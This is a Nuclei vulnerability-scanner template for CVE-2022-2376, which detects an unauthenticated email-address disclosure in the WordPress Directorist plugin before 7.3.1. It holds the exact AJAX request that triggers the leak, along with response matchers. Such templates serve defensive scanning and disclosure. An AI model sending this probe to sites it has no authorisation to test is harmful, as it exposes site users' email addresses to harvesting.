nuclei-templates/http/cves/2022/CVE-2022-2376.yaml

52 lines
1.7 KiB
YAML

id: CVE-2022-2376
info:
name: WordPress Directorist <7.3.1 - Information Disclosure
author: Random-Robbie
severity: medium
description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
remediation: Fixed in version 7.3.1.
reference:
- https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
- https://nvd.nist.gov/vuln/detail/CVE-2022-2376
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2376
cwe-id: CWE-862
epss-score: 0.04933
epss-percentile: 0.9189
cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wpwax
product: directorist
framework: wordpress
tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'directorist-authors__card__details__top'
- 'directorist-authors__card__info-list'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100a0ffc12603c7171e35f1e97586763de3ff5d9fc91881ad9e00e214490ac30a13022068bb2fb1acfd31d22b5a4116b2c3c90e833378d53266892a8f3dd21ede6e79ec:922c64590222798bb761d5b6d8e72950